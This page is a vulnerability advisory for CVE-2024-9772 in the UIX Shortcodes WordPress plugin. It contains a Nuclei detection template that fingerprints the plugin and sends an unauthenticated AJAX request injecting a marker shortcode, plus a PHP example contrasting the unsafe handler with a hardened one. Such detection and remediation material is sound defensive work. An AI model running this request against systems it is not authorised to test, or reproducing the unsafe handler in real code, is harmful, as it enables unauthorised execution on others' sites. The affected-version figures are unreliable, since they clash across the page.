The Uix Shortcodes – Compatible with Gutenberg plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 1.9.9. This is due to the plugin exposing an action that does not validate the supplied value before passing it to do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.
PoC code [public]
id: CVE-2024-9772

info:
  name: WordPress UIX Shortcodes <= 1.9.7 - Unauthenticated Shortcode Execution
  author: kankburhan
  severity: high
  description: |
    The Uix Shortcodes – Compatible with Gutenberg plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 1.9.9. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.
  remediation: |
    Update UIX Shortcodes plugin to the latest patched version (>= 1.9.8).
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-9772
    - https://downloads.wordpress.org/plugin/uix-shortcodes.1.9.7.zip
    - https://plugins.trac.wordpress.org/browser/uix-shortcodes/trunk/shortcodes/templates/default/frontpage-init.php#L9
    - https://wordpress.org/plugins/uix-shortcodes/#developers
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/3000758d-68e0-46a6-aef0-e2407a828168?source=cve
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
    cvss-score: 7.3
    cve-id: CVE-2024-9772
    cwe-id: CWE-94
    epss-score: 0.05077
    epss-percentile: 0.89392
    cpe: cpe:2.3:a:uiux:uix_shortcodes:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: uiux
    product: uix_shortcodes
    framework: wordpress
    publicwww-query: "/wp-content/plugins/uix-shortcodes/"
  tags: cve,cve2024,wordpress,wp-plugin,wp,wpscan,shortcode,uix-shortcodes

variables:
  string: "{{to_lower('{{randstr}}')}}"

flow: http(1) && http(2)

http:
  # Request 1: fingerprint the plugin and extract the installed version from readme.txt
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/uix-shortcodes/readme.txt"

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains(body, 'Uix Shortcodes')"
          - "compare_versions(version, '<= 1.9.7')"
        condition: and
        internal: true

    extractors:
      - type: regex
        part: body
        group: 1
        name: version
        regex:
          - 'Stable tag: ([0-9.]+)'
        internal: true

  # Request 2: only reached when request 1 matched; the random marker is reflected
  # in the rendered preview if the unauthenticated AJAX action ran do_shortcode
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=uixscform_ajax_shortcodepreview&previewcode=[uix_sc_text text='{{string}}']

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "{{string}}")'
          - 'contains(content_type, "text/html")'
          - 'status_code == 200'
        condition: and
# digest: 490a0046304402200d7726b197d69cee51fbd7dbfd9da9718a1ac7ebb9c98e26dee1b25013e9b647022016ab32735cab354a164b4978c12ab37db187070d191954b44b2971d9fa9df5e6:922c64590222798bb761d5b6d8e72950
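As an added example, not the plugin's own code and not taken from the trac reference above, a hypothetical WordPress AJAX preview handler showing the unsafe pattern the description names (an action reachable without authentication that hands its input straight to do_shortcode) next to a hardened version. The action name uixscform_ajax_shortcodepreview and the previewcode parameter come from the template; the function names, the nonce action and the allow-list are assumptions.

```php
<?php
// Hypothetical handler written for this page; not the plugin's own code.
// Action and parameter names come from the template above; function names,
// the nonce action and the allow-list are assumptions.

// Unsafe pattern described by the advisory: the value is handed to
// do_shortcode() unchecked, and a wp_ajax_nopriv_ hook exposes the action
// to visitors who are not logged in, so any shortcode registered on the
// site can be triggered by an anonymous POST to admin-ajax.php.
// (Hooks left commented so that only the hardened handler is registered.)
// add_action( 'wp_ajax_nopriv_uixscform_ajax_shortcodepreview', 'example_preview_unsafe' );
// add_action( 'wp_ajax_uixscform_ajax_shortcodepreview', 'example_preview_unsafe' );
function example_preview_unsafe() {
    echo do_shortcode( wp_unslash( $_POST['previewcode'] ) );
    wp_die();
}

// Hardened handler: no nopriv hook (logged-in users only), a nonce bound to
// this action, a capability check, and do_shortcode() run with the global
// shortcode table temporarily reduced to the plugin's own tags, so no other
// shortcode can execute even when nested inside an allowed one.
add_action( 'wp_ajax_uixscform_ajax_shortcodepreview', 'example_preview_safe' );
function example_preview_safe() {
    check_ajax_referer( 'uixscform_preview', 'nonce' ); // dies on a missing or bad nonce
    if ( ! current_user_can( 'edit_posts' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    $code = isset( $_POST['previewcode'] ) ? wp_unslash( $_POST['previewcode'] ) : '';
    if ( ! is_string( $code ) || strlen( $code ) > 10000 ) {
        wp_send_json_error( 'bad request', 400 );
    }

    // Assumed allow-list; a real plugin would list exactly the tags it registers.
    $allowed = array( 'uix_sc_text' );

    global $shortcode_tags;
    $saved          = $shortcode_tags;
    $shortcode_tags = array_intersect_key( $saved, array_flip( $allowed ) );
    $html           = do_shortcode( $code );
    $shortcode_tags = $saved; // always restore the full table afterwards

    wp_send_json_success( wp_kses_post( $html ) );
}
```

The nonce must be generated with wp_create_nonce( 'uixscform_preview' ) on the editor side and sent as the nonce field, otherwise check_ajax_referer() rejects the request.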